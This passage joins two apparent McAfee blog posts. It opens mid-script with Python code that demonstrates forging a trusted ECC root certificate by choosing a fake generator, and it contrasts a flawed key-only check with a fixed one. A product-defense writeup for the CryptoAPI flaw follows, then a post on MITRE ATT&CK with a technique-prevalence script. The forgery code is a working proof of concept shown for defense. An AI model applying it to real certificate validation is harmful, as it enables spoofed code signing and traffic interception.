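N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
# The point at infinity is represented as None.


def is_on_curve(pt):
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition on y^2 = x^3 + A*x + B over GF(P)."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                                   # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, pt):
    """Double-and-add scalar multiplication; k is a non-negative integer."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


# A trusted root CA. The private key is a constructed example value, not a real CA key;
# only the public key Q and the named curve it uses live in the trust store.
CA_PRIVATE = 0x1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef
CA_PUBLIC = scalar_mult(CA_PRIVATE, G)
TRUSTED_ROOT = {"curve": "P-256", "generator": G, "order": N, "public_key": CA_PUBLIC}


def spoofed_root(target_public, chosen_private):
    """Attacker's certificate with explicit parameters: pick any private key d', then set
    G' = d'^-1 (mod N) * Q so that d' * G' == Q, the trusted CA's public point."""
    fake_generator = scalar_mult(pow(chosen_private, -1, N), target_public)
    return {"curve": "explicit", "generator": fake_generator, "order": N,
            "public_key": scalar_mult(chosen_private, fake_generator)}


def vulnerable_match(cert, trusted):
    """The flawed test: the root is trusted if its public key point matches a cached root."""
    return cert["public_key"] == trusted["public_key"]


def fixed_match(cert, trusted):
    """The corrected test: the public key must match *and* the certificate must use the
    same named curve (same generator and order) as the cached root."""
    return (cert["public_key"] == trusted["public_key"]
            and cert["curve"] == trusted["curve"]
            and cert["generator"] == trusted["generator"]
            and cert["order"] == trusted["order"])


if __name__ == "__main__":
    forged = spoofed_root(CA_PUBLIC, 0x1337)
    print("public key matches:", forged["public_key"] == CA_PUBLIC)
    print("vulnerable check accepts forged root:", vulnerable_match(forged, TRUSTED_ROOT))
    print("fixed check accepts forged root:", fixed_match(forged, TRUSTED_ROOT))
```

The forged root carries the same public key bytes as the real one, so anything it signs chains to the pinned CA under the flawed comparison; because the attacker knows the private key 0x1337 for that key under their own generator, they can sign whatever they like. The simplest hardening is stricter than `fixed_match`: reject explicit EC parameters outright and accept only a named-curve OID, which is also the feature to hunt for when reviewing certificates already seen in the environment.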

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations that follow 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and guidance on how to detect exploitation, urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) has also released an emergency directive alerting the US private sector and government entities to the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems.  Specifically:

McAfee Endpoint Security (ENS)

McAfee ENS can help protect against this vulnerability with a signature set that detects fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help identify file-signing abuse prior to patching by providing a workflow to pivot from spoofed CAs to the binaries they signed that have already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures in the Emergency Signature Set prevent file-signing abuse by blocking connections that use certificates known to be impacted by the vulnerability.

McAfee Web Gateway

File inspection for signatures has been implemented in Web Gateway Anti-Malware. Using HTTPS scanning on the Web Gateway moves certificate validity checks from the endpoints to the gateway and provides a central HTTPS certificate policy that does not rely on the vulnerable function.


MVISION EDR

MVISION EDR can detect exploit attempts for this vulnerability on patched systems. To identify devices that have recently been involved in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using the NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response can detect exploit attempts for this vulnerability. To identify devices that have recently been involved in an exploit attempt, the customer can use the Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also run a real-time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by matching events routed to the SIEM against new signatures available through the normal content update process. (Refer to the knowledge-base article outlining how to update ESM rules.)

New rules have been uploaded to the content server with new signature IDs and descriptions for these events. Customers can use these to create alarms.

Full details on how to access these solutions are outlined in knowledge-base article KB92322, which we will continue to update with any additional recommendations or findings.

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

MITRE ATT&CK™, What’s the Big Idea?

MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management. 

                  Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities. They described the process of taking the larger ATT&CK Matrix and reducing it to a more contextual and manageable set of items they could action, in order to mitigate the vectors most relevant to their organization.

One great aspect of ATT&CK is that the data is available for all to see.  Leveraging the collective base of reports, we can build a prevalence view of the matrix.  As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

              MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools. Indeed, this is an important and heavily used technique, present in attacks carried out by various actors including APT3 and APT38, as well as in noteworthy malware attacks such as Shamoon and WannaCry, to name a few.
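The prevalence view above is a straightforward count over MITRE’s public data, which ships as a STIX 2 bundle. As an added example (not McAfee’s code or MITRE’s tooling), the functions below compute that view: for each non-revoked technique, the share of actors and software objects that have at least one “uses” relationship to it. The bundle here is a constructed miniature in the same shape as the ATT&CK export, so the numbers are illustrative; applied to the full export, the same counting produces a treemap-style ranking of the kind shown. Note that groups and the tools they use are counted independently, which is how the page’s “449 actors and tools” denominator is built.

```python
from collections import defaultdict

# Constructed miniature of the ATT&CK STIX 2 bundle layout (not the real data set):
# actors (intrusion-set) and software (tool, malware) are linked to techniques
# (attack-pattern) by "uses" relationships; ATT&CK IDs live in external_references.
BUNDLE = {"objects": [
    {"type": "intrusion-set", "id": "intrusion-set--0001", "name": "Actor A"},
    {"type": "intrusion-set", "id": "intrusion-set--0002", "name": "Actor B"},
    {"type": "tool", "id": "tool--0001", "name": "Tool T"},
    {"type": "malware", "id": "malware--0001", "name": "Malware M"},
    {"type": "attack-pattern", "id": "attack-pattern--0001", "name": "Remote File Copy",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1105"}]},
    {"type": "attack-pattern", "id": "attack-pattern--0002", "name": "Deobfuscate/Decode Files or Information",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1140"}]},
    {"type": "attack-pattern", "id": "attack-pattern--0003", "name": "Old Technique", "revoked": True,
     "external_references": [{"source_name": "mitre-attack", "external_id": "T0000"}]},
    {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--0001", "target_ref": "attack-pattern--0001"},
    {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--0001", "target_ref": "attack-pattern--0001"},  # duplicate report
    {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--0002", "target_ref": "attack-pattern--0001"},
    {"type": "relationship", "relationship_type": "uses", "source_ref": "tool--0001", "target_ref": "attack-pattern--0001"},
    {"type": "relationship", "relationship_type": "uses", "source_ref": "malware--0001", "target_ref": "attack-pattern--0002"},
    {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--0001", "target_ref": "tool--0001"},  # actor uses tool, not a technique
    {"type": "relationship", "relationship_type": "uses", "source_ref": "intrusion-set--0002", "target_ref": "attack-pattern--0003"},  # revoked technique
]}

USER_TYPES = {"intrusion-set", "tool", "malware"}


def attack_id(obj):
    """Pull the Txxxx identifier out of a STIX object's external references."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def prevalence(bundle):
    """Map ATT&CK id -> {name, count, percent}: the share of actor/software objects that use
    each live technique. Duplicate relationships count once; revoked/deprecated techniques
    and actor->tool links are ignored."""
    objs = {o["id"]: o for o in bundle["objects"] if o["type"] != "relationship"}
    users = {oid for oid, o in objs.items() if o["type"] in USER_TYPES}
    techniques = {oid: o for oid, o in objs.items()
                  if o["type"] == "attack-pattern"
                  and not o.get("revoked") and not o.get("x_mitre_deprecated")}
    used_by = defaultdict(set)
    for rel in bundle["objects"]:
        if (rel["type"] == "relationship" and rel.get("relationship_type") == "uses"
                and rel["source_ref"] in users and rel["target_ref"] in techniques):
            used_by[rel["target_ref"]].add(rel["source_ref"])
    result = {}
    for tid, tech in techniques.items():
        count = len(used_by[tid])
        result[attack_id(tech)] = {"name": tech["name"], "count": count,
                                   "percent": round(100.0 * count / len(users), 1) if users else 0.0}
    return result


def top_techniques(bundle, limit=10):
    """Ranked (ATT&CK id, name, percent) tuples for a treemap-style view."""
    prev = prevalence(bundle)
    ranked = sorted(prev.items(), key=lambda kv: (-kv[1]["count"], kv[0]))
    return [(tid, v["name"], v["percent"]) for tid, v in ranked[:limit]]


if __name__ == "__main__":
    for tid, name, pct in top_techniques(BUNDLE):
        print(f"{tid} {name}: {pct}%")
```

When running this against the real export, filter to the Enterprise matrix first and decide whether sub-techniques roll up into their parent, since both choices change the denominator and the ranking.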

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to see the activities of an adversary. The first evaluation, or Round 1, was based on an APT3-style attack and included many of the items on the treemap above. As you might expect, Remote File Copy was represented. During the evaluation, MITRE copied a DLL to a remote system (something the Petya malware does). While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors to show a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison), a designation reserved for the most descriptive of all detection categories (see Round 1 Detection Categories). For more information on McAfee’s Round 1 results, see: MITRE ATT&CK™ APT3 Assessment

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces.  Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.


The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.